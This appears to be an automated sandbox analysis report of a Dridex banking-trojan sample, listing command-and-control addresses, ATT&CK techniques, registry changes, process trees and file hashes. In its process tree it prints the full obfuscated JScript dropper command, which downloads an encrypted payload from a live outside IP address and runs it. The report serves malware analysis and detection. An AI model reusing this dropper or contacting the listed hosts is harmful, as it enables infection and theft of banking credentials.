dridex | hxxps://hilltop2exit[.]xyz/kjlfkvd82d

General

Target

https://hilltop2exit.xyz/kjlfkvd82d
Sample

211020-b6eqbagea9

Score

10^/10

dridex 10111 botnet discovery evasion persistence trojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

37.48.124.102:9676

84.33.2.126:6225

188.40.33.77:8194

rc4.plain

Signatures

Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
botnet dridex
Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Blocklisted process makes network request 1 IoCs

Processes:

wscript.exe

flow pid process

28 3596 wscript.exe
Executes dropped EXE 1 IoCs

Processes:

xosz5.exe

pid process

4632 xosz5.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

xosz5.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xosz5.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
28	3596	wscript.exe

pid	process
4632	xosz5.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	xosz5.exe

Modifies Internet Explorer settings 1 TTPs 40 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "599506391"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "643568880"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30917469"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "599350193"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz!	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A78E4FBF-33B3-11EC-B8A3-521E7FC6DF29} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30917469"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ja-JP = "ja-JP.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "341259824"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "341291816"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "341243230"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30917469"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Modifies registry class 44 IoCs

Processes:

FileSyncConfig.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INSTANCE\INITPROPERTYBAG	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\FolderValueFlags = "40"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INPROCSERVER32	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\SysWow64\\shell32.dll"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\system32\\shell32.dll"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\TargetKnownFolder = "{a52bba46-e9e1-435f-b3d9-28daa648c0f6}"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INSTANCE\INITPROPERTYBAG	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\Attributes = "17"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SHELLFOLDER	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ = "OneDrive"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "1"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\Attributes = "4034920525"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\CLSID = "{0E5AAE11-A475-4c5b-AB00-C66DE400274E}"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\Attributes = "4034920525"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ = "OneDrive"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe,0"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "1"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\FolderValueFlags = "40"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe,0"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\CLSID = "{0E5AAE11-A475-4c5b-AB00-C66DE400274E}"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\TargetKnownFolder = "{a52bba46-e9e1-435f-b3d9-28daa648c0f6}"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\Attributes = "17"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INPROCSERVER32	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SHELLFOLDER	FileSyncConfig.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

iexplore.exe

pid process

4456 iexplore.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

4456 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

4456 iexplore.exe
4456 iexplore.exe
524 IEXPLORE.EXE
524 IEXPLORE.EXE
524 IEXPLORE.EXE
524 IEXPLORE.EXE

pid	process
4456	iexplore.exe

pid	process
4456	iexplore.exe

pid	process
4456	iexplore.exe
4456	iexplore.exe
524	IEXPLORE.EXE
524	IEXPLORE.EXE
524	IEXPLORE.EXE
524	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exe

description	pid	process	target process
PID 4456 wrote to memory of 524	4456	iexplore.exe	IEXPLORE.EXE
PID 4456 wrote to memory of 524	4456	iexplore.exe	IEXPLORE.EXE
PID 4456 wrote to memory of 524	4456	iexplore.exe	IEXPLORE.EXE
PID 524 wrote to memory of 2780	524	IEXPLORE.EXE	cmd.exe
PID 524 wrote to memory of 2780	524	IEXPLORE.EXE	cmd.exe
PID 524 wrote to memory of 2780	524	IEXPLORE.EXE	cmd.exe
PID 2780 wrote to memory of 3596	2780	cmd.exe	wscript.exe
PID 2780 wrote to memory of 3596	2780	cmd.exe	wscript.exe
PID 2780 wrote to memory of 3596	2780	cmd.exe	wscript.exe
PID 3596 wrote to memory of 2660	3596	wscript.exe	cmd.exe
PID 3596 wrote to memory of 2660	3596	wscript.exe	cmd.exe
PID 3596 wrote to memory of 2660	3596	wscript.exe	cmd.exe
PID 2660 wrote to memory of 4632	2660	cmd.exe	xosz5.exe
PID 2660 wrote to memory of 4632	2660	cmd.exe	xosz5.exe
PID 2660 wrote to memory of 4632	2660	cmd.exe	xosz5.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://hilltop2exit.xyz/kjlfkvd82d
1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4456

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4456 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\SysWOW64\cmd.exe
cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.40/?NTc0ODE4&VhFPEbe&ogfgafgn4=wn3QMvXcLBXQFYPDJf7cT&fhfghddfsdf=arena&sdfsdfdfg=twix&dsfdffg43t=6dDKUfYHliJz5GY3fqSCZz9JHT10NzUSkry6B2aCl_h_fEoL7RSOVDjikTRewdlndhZUAsSoaivhhCGyBSf0sbW_xaIYlhE-qKcHLALhR32zoE&cxssdvxcv=82sstreet.121hg96.406g0h8w9&lzVXTKTNMTc5MDM=" "2""
3⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.40/?NTc0ODE4&VhFPEbe&ogfgafgn4=wn3QMvXcLBXQFYPDJf7cT&fhfghddfsdf=arena&sdfsdfdfg=twix&dsfdffg43t=6dDKUfYHliJz5GY3fqSCZz9JHT10NzUSkry6B2aCl_h_fEoL7RSOVDjikTRewdlndhZUAsSoaivhhCGyBSf0sbW_xaIYlhE-qKcHLALhR32zoE&cxssdvxcv=82sstreet.121hg96.406g0h8w9&lzVXTKTNMTc5MDM=" "2""
4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c xosz5.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:2660

C:\Users\Admin\AppData\Local\Temp\xosz5.exe
xosz5.exe
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4632

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe"
1⤵
- Modifies registry class
PID:2152

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
MD5
bcc1cc8e9989b87087d23e119f44f534

SHA1
5f1f9622769b1a11ea6a5a67af094b82d6052fd1

SHA256
b4bb217e52ab6f7ddab1ccafda702ac33f338dfc65eaaa955afdb1979f19ca46

SHA512
73e3befee1440cf382a23ab83f331f17ada79a72815c5f844336830857c385ead9883eb94bbe0cae9d910618d32964f61bb30650c7e367cea2e8e9bcf4f66552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
MD5
3be0e026c127b5d3327d56f141742935

SHA1
655b40b7a5c2c6ad78d4ebd7f91da0e44a7ed850

SHA256
442f98517b8a271df518cd1479e65c1c43cea86d24b31a27c0ecffa119d430e6

SHA512
970d266bde266a751b2c304dc59a978261c1451c8af2dd7b47664a5d0c3c0391b0a3845ad0e258efe32167bdc8e4e21ed06c5b55f02a9c06e1b30ca128ee9274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\JQEEFHR9.cookie
MD5
33c3f1809bfa6aa75cd7695e023dfdf7

SHA1
dca3d2532a2fc6ab6db0d52ec27cfd268f8686be

SHA256
6bc4ec8342ae6e39d1c0507851d96e6b3d7e6207bba28d14ef8f3551a299f21c

SHA512
4f52badcf1b2ad3a662a12b5e1beaddb59e21498587b81bc06509aeda9b4123812101571106d0ebdb17fd544c473e728ef9b948ab82a938f396880e9e2f3bf93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\TIQWCGAP.cookie
MD5
d030018e5f37ea673b68bfec6ac855f3

SHA1
bcde641fc401ca276d50a0e7281efa0ab992f7cb

SHA256
f678da573bc0a08d28b061f116572f827479b409bfff92079fff458242ce2bd1

SHA512
20c3e9c1c869672b132a9d240138cdf6bafabb1aca7362714f4b5585673c3b22e4ba5072b160ceadb5f1f6501dbab5c247df6fc1a9a774ba94a3d0e9f363dfa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.tMp
MD5
60fc00422b399db85f87d41b8328976d

SHA1
bb85034acad8025f97e5bb236443debaf8926e4b

SHA256
c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

SHA512
16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

Download Submit
C:\Users\Admin\AppData\Local\Temp\xosz5.exe
MD5
99c777be6fb871151545cfcc59c3f89f

SHA1
d2855b68c2aa24d4721bc0a30c0e7b2a747acefd

SHA256
e3dc9d3ef3a79da287ae7357a2d64c47bb01a27946c62c80225636c1bfa03629

SHA512
441792a45ffdd663a3e0b81bc797bab39c9de3ea7bc88814c2722fc4d915dc67ed8ec2eb9688cbcb2ae0550fccfaaa1f481ddf24f47d0050663c5c1fba4c5ef3

Download Submit
C:\Users\Admin\AppData\Local\Temp\xosz5.exe
MD5
99c777be6fb871151545cfcc59c3f89f

SHA1
d2855b68c2aa24d4721bc0a30c0e7b2a747acefd

SHA256
e3dc9d3ef3a79da287ae7357a2d64c47bb01a27946c62c80225636c1bfa03629

SHA512
441792a45ffdd663a3e0b81bc797bab39c9de3ea7bc88814c2722fc4d915dc67ed8ec2eb9688cbcb2ae0550fccfaaa1f481ddf24f47d0050663c5c1fba4c5ef3

Download Submit
memory/524-140-0x0000000000000000-mapping.dmp

Download
memory/2660-184-0x0000000000000000-mapping.dmp

Download
memory/2780-181-0x0000000000000000-mapping.dmp

Download
memory/3596-182-0x0000000000000000-mapping.dmp

Download
memory/4456-151-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-166-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-131-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-132-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-133-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-136-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-135-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-137-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-138-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
memory/4456-128-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp

Filesize
428KB

Download
